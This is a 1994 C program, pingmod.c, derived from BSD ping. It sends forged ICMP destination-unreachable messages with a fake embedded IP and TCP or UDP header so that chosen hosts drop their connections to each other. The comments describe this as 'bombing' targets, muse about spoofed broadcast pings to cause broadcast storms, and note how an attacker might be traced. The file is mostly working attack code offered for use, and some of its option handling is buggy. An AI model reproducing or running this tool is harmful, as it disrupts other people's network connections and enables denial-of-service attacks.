/* pingmod.c - v1.00 - based on ping-590 from the ucb sources (M.Muuss) */
/* Michael R. Widner. (atreus) - 4/4/94

 * the routine pingmod() appends a fake IP packet to an icmp packet.
 * It will send fake DESTINATION UNREACHABLE messages, and will do either
 * host or net unreachable.
 *
 * I'd like to modify it to send ECHO icmps with a fake return
 * ip address.  Why?  Because pinging a broadcast address on your
 * local net causes a lot of traffic.  Changing the return ip address
 * to something bogus causes 4 'arp who has' requests for every echo
 * requests.  Sending these at a rapid rate can cause kick ass broadcast
 * storms.
 *
 * I can think of two ways to fake your ip address. 
 * I don't like either of them right now, so I'm putting off doing that
 * until one seems good, or I get really bored.
 *
 * Actually, when I get really bored I'm gonna rewrite this whole god damn
 * thing, because the code I based it on is ugly, and this is even uglier.
 *
 * usage:  pingmod [-nb] [-c int] [-i int] dest_host unreachable_host [dest host ...]
 *           -b means 'both ways'.  It's just like running the prog
 *              twice and swapping the arguments.
 *           -n sends 'network unreachable' rather than the default
 *              host unreachable messages.
 *           -q do it quietly
 *           -p send port unreachable message
 *           -s int  source port which is unreachable
 *           -d int  destination port which is unreachable
 *           -c int  number of packets to send
 *           -i int  seconds to wait between packets
 *           -u      make fake packet a udp (default is tcp)
 *            .      substitute for last name in pair
 *
 *
 * Be forewarned that this program will send packets that still contain
 * your real IP address.  Because of this, it is possible (although very
 * unlikely) that somebody who is tired of being bombed can find out who
 * is bombing them.  They would have to have a sniffer running or some
 * type of icmp logging, but it is possible.
 *
 * This should compile under bsd or sysv. */

#ifdef SYSV
#define bcopy(b1,b2,len) memmove(b2, b1, (size_t)(len))
#define bzero(b,len) memset(b, 0, (size_t)(len))
#endif

/* Pretty generous group of includes.  Someday I'll narrow this list. */
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/file.h>
#include <sys/time.h>
#include <sys/signal.h>

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_var.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <ctype.h>
#include <string.h>

/* various options */
int options;
#define	F_FLOOD		0x001
#define	F_INTERVAL	0x002
#define	F_NUMERIC	0x004
#define	F_ECHO		0x008
#define	F_QUIET		0x010
#define	F_RROUTE	0x020
#define	F_SO_DEBUG	0x040
#define	F_VERBOSE	0x080
#define	F_BOTH_WAYS	0x100
#define	F_NETWORK	0x200
#define	F_PORT		0x400
#define	F_UDP		0x800


#define	MAXPACKET	(65536 - 60 - 8)/* max packet size - I dont need this */

/* global variables.  This is uglier than your mother. */
int s;				/* socket file descriptor */

void usage()
{
	(void)fprintf(stderr,
	    "usage: pingmod [-bn] [-c int] [-i int] dest_host unreach_host ...\n");
	fprintf(stderr,"  -b    send both ways\n");
	fprintf(stderr,"  -q    do it quietly\n");
	fprintf(stderr,"  -n    send network unreach (default is host)\n");
	fprintf(stderr,"  -p    send port unreach\n");
	fprintf(stderr,"  -s x  source port which is unreachable\n");
	fprintf(stderr,"  -d x  destination port which is unreachable\n");
	fprintf(stderr,"  -u    make fake packet udp (default is tcp)\n");
	fprintf(stderr,"  -c x  number or packets to send\n");
	fprintf(stderr,"  -i x  seconds to wait betwen packets\n");
	fprintf(stderr,"  .     sub dest or source from previous host pair\n");
	fprintf(stderr,"        ie: pingmod 1 2 . 3  = pingmod 1 2 1 3\n");
	exit(1);
}


/*
 * pr_addr --
 *	Return an ascii host address as a dotted quad and optionally with
 * a hostname.
 */
char *
pr_addr(l)
	struct in_addr l;
{
	struct hostent *hp;
	static char buf[80];

	if ((options & F_NUMERIC) ||
	    !(hp = gethostbyaddr((char *)&l, 4, AF_INET)))
		(void)sprintf(buf, "%s", inet_ntoa(l));
	else
		(void)sprintf(buf, "%s (%s)", hp->h_name,
		    inet_ntoa(l));
	return(buf);
}


main(argc, argv)
	int argc;
	char **argv;
{
	extern int optind;
	extern char *optarg;
	struct hostent *hp;
	struct sockaddr whereto;	/* who to ping */
	struct sockaddr_in *to;
	struct sockaddr wherefrom;	/* who are we faking from */
	struct sockaddr_in *from;
	struct protoent *proto;
	register int i;
	long npackets = 1;		/* packets to transmit */
	int interval = 1;		/* interval between packets */
	int ch, fdmask, hold, packlen, argloop;
	u_char *datap, *packet;
	u_short sport=1024,dport=23;
	char *target, *whosunreach, hnamebuf[MAXHOSTNAMELEN];
	char *hostname;

	while ((ch = getopt(argc, argv, "bc:i:nqu")) != EOF)
		switch(ch) {
		case 'b':
			options |= F_BOTH_WAYS;
			break;
		case 'c':
			npackets = atoi(optarg);
			if (npackets <= 0) {
				(void)fprintf(stderr,
				    "pingmod: bad number of packets to transmit.\n");
				exit(1);
			}
			break;
		case 's':
			sport = atoi(optarg);
			break;
		case 'd':
			dport = atoi(optarg);
			break;
		case 'f':
			options |= F_FLOOD;
			setbuf(stdout, (char *)NULL);
			break;
		case 'i':		/* wait between sending packets */
			interval = atoi(optarg);
			if (interval <= 0) {
				fprintf(stderr,
				    "pingmod: bad timing interval.\n");
				exit(1);
			}
			options |= F_INTERVAL;
			break;
		case 'n':
			options |= F_NETWORK;
			break;
		case 'p':
			options |= F_PORT;
			break;
		case 'q':
			options |= F_QUIET;
			break;
		case 'u':
			options |= F_UDP;
			break;
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

	if (argc < 2)
		usage();

	/* initialize target and whosunreach so 'pingmod . .' will behave */
	target=*argv;
	whosunreach=*argv;

	while(npackets)
	{
	argloop=0;
	
	while (argloop<(argc-1))
	{
	if (strcmp(argv[argloop],"."))
		target = argv[argloop];
	argloop++;
	if (strcmp(argv[argloop],"."))
		whosunreach = argv[argloop];
	argloop++;

	/* clear and assign socket struct */
	bzero((char *)&whereto, sizeof(struct sockaddr));
	to = (struct sockaddr_in *)&whereto;

	bzero((char *)&wherefrom, sizeof(struct sockaddr));
	from = (struct sockaddr_in *)&wherefrom;


	/* build a sockaddr for our fake unreachable host. */
	from->sin_family = AF_INET;
	from->sin_addr.s_addr = inet_addr(whosunreach); /* 1.2.3.4 to u_long */
	if (from->sin_addr.s_addr != (u_int)-1)
		hostname = target;
	else {                                   /* it's a name, look it up */
		hp = gethostbyname(whosunreach);
		if (!hp) {
			(void)fprintf(stderr,
			    "pingmod: unknown dest %s\n", target);
			exit(1);
		}
		from->sin_family = hp->h_addrtype;
		bcopy(hp->h_addr, (caddr_t)&from->sin_addr, hp->h_length);
		(void)strncpy(hnamebuf, hp->h_name, sizeof(hnamebuf) - 1);
		hostname = hnamebuf;
	}

	/* Now do same thing for real source.  */
	to->sin_family = AF_INET;
	to->sin_addr.s_addr = inet_addr(target); /* 1.2.3.4 to u_long */
	if (to->sin_addr.s_addr != (u_int)-1)
		hostname = target;
	else {                                   /* it's a name, look it up */
		hp = gethostbyname(target);
		if (!hp) {
			(void)fprintf(stderr,
			    "pingmod: unknown source %s\n", target);
			exit(1);
		}
		to->sin_family = hp->h_addrtype;
		bcopy(hp->h_addr, (caddr_t)&to->sin_addr, hp->h_length);
		(void)strncpy(hnamebuf, hp->h_name, sizeof(hnamebuf) - 1);
		hostname = hnamebuf;
	}

	/* Let the user know what's going on */
	if (!(options & F_QUIET)) {
		printf("source: %-40s",pr_addr(to->sin_addr));
		printf("dest: %s\n",pr_addr(from->sin_addr));
	}


	/* You cant flood at an interval, you dumbass */
	/* of course I don't have either implemented yet */
	if (options & F_FLOOD && options & F_INTERVAL) {
		(void)fprintf(stderr,
		    "pingmod: -f and -i incompatible options.\n");
		exit(1);
	} 

	/* Do we know icmp? */
	if (!(proto = getprotobyname("icmp"))) {
		(void)fprintf(stderr, "pingmod: unknown protocol icmp.\n");
		exit(1);
	}


	/* create the socket */
	if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) {
		perror("pingmod: socket");
		exit(1);
	}
	hold = 1;


	/* Send the packets */
	pingmod(whereto,to->sin_addr,sport,from->sin_addr,dport);
	if (options & F_BOTH_WAYS )  /* and reverse if desired */
		pingmod(wherefrom,from->sin_addr,dport,to->sin_addr,sport);

	} /* end of arguments while loop */

	if (--npackets) { sleep(interval); }
	} /* end of npackets while loop */
	exit(0);
}


/*
 * pingmod --
 *    This is a modified routine from ping.  It appends a fake IP header to
 * an ICMP dest. unreachable message.
 * What I'd really like to do is create the whole packet myself, including
 * the MAC and IP headers.  I can't do that using the present socket setup,
 * but eventually I'll get it to work.
 */
pingmod(whereto, source,s_port, dest,d_port)
	struct sockaddr whereto;
	struct in_addr source,dest;
	u_short s_port,d_port;
{
	struct icmp *icp;
	u_char *whole_packet, *next_location;
	struct tcphdr *tcp_start;
	struct udphdr *udp_start;
	int cc,i;

	/* allocated some stuff we use */
	whole_packet=(u_char *)malloc(MAXPACKET);
	icp=(void *)whole_packet;
	next_location=whole_packet;

	/* Set header for ECHO or UNREACH type. */
	if (options & F_ECHO)
		icp->icmp_type = ICMP_ECHO;
	else
		icp->icmp_type = ICMP_UNREACH;


	/* And set for network, port, or host unreachable */
	if (options & F_NETWORK )
		icp->icmp_code = ICMP_UNREACH_NET;
	else if (options & F_PORT )
		icp->icmp_code = ICMP_UNREACH_PORT;
	else
		icp->icmp_code = ICMP_UNREACH_HOST;

	/* Clear out the stuff we're not using. */
	icp->icmp_cksum = 0;
	icp->icmp_seq = 0;
	icp->icmp_id = 0;


	/* Create our fake IP header here. */
	icp->icmp_ip.ip_v=4;	/* version 4 ip */
	icp->icmp_ip.ip_hl=5;	/* header length in 32-bit words */
	icp->icmp_ip.ip_tos=0;	/* type of service is 0 */
	icp->icmp_ip.ip_len=256;/* length of orig (fake) paket.  type short */
	icp->icmp_ip.ip_id=0;	/* identification - do we need it? */
	icp->icmp_ip.ip_off=0;	/* fragment offset */
	icp->icmp_ip.ip_ttl=25;	/* arbitrary ttl remaining */
	if (options & F_UDP)	/* protocol:  6=tcp  17=udp */
		icp->icmp_ip.ip_p=IPPROTO_UDP;
	else
		icp->icmp_ip.ip_p=IPPROTO_TCP;
	icp->icmp_ip.ip_sum=0;	/* type short:  arbitrary fake chksum */
	icp->icmp_ip.ip_src=source;	/* source address */
	icp->icmp_ip.ip_dst=dest;	/* destination address */


	/* We have to append 8 bytes of data after for an unreachable message */
	/* For tcp & udp the first 4 bytes are source & dest port */
	/* for tcp the next 4 are sequence number.  */
	/* for udp they are length (2 bytes) and checksum (2 bytes) */
	next_location=whole_packet+sizeof(struct icmp);
	tcp_start=(void *)next_location;
	if (options & F_UDP)
	{
		udp_start=(void *)next_location;
		udp_start->uh_sport=s_port;
		udp_start->uh_dport=d_port;
		udp_start->uh_ulen=1000;
		udp_start->uh_sum=1000;
	}
	else
	{
		tcp_start->th_sport=s_port;
		tcp_start->th_dport=d_port;
		tcp_start->th_seq=1000;
	}

	/* compute ICMP checksum here */
	cc = sizeof(struct icmp)+8;	/* icmp hd + ip head + 64 bits data */
	icp->icmp_cksum = in_cksum((u_short *)icp, cc);

	i = sendto(s, (char *)whole_packet, cc, 0, &whereto,
	    sizeof(struct sockaddr));

	/* check that correct number of bytes were sent */
	if (i < 0 || i != cc)  {
		if (i < 0)
			perror("pingmod: sendto");
		printf("pingmod: wrote %d chars, ret=%d\n", cc, i);
	} 

	/* free up the packet we just built */
	free(whole_packet);
}

/*
 * in_cksum --
 *	Checksum routine for Internet Protocol family headers (C Version)
 */
in_cksum(addr, len)
	u_short *addr;
	int len;
{
	register int nleft = len;
	register u_short *w = addr;
	register int sum = 0;
	u_short answer = 0;

	/*
	 * Our algorithm is simple, using a 32 bit accumulator (sum), we add
	 * sequential 16 bit words to it, and at the end, fold back all the
	 * carry bits from the top 16 bits into the lower 16 bits.
	 */
	while (nleft > 1)  {
		sum += *w++;
		nleft -= 2;
	}

	/* mop up an odd byte, if necessary */
	if (nleft == 1) {
		*(u_char *)(&answer) = *(u_char *)w ;
		sum += answer;
	}

	/* add back carry outs from top 16 bits to low 16 bits */
	sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
	sum += (sum >> 16);			/* add carry */
	answer = ~sum;				/* truncate to 16 bits */
	return(answer);
}
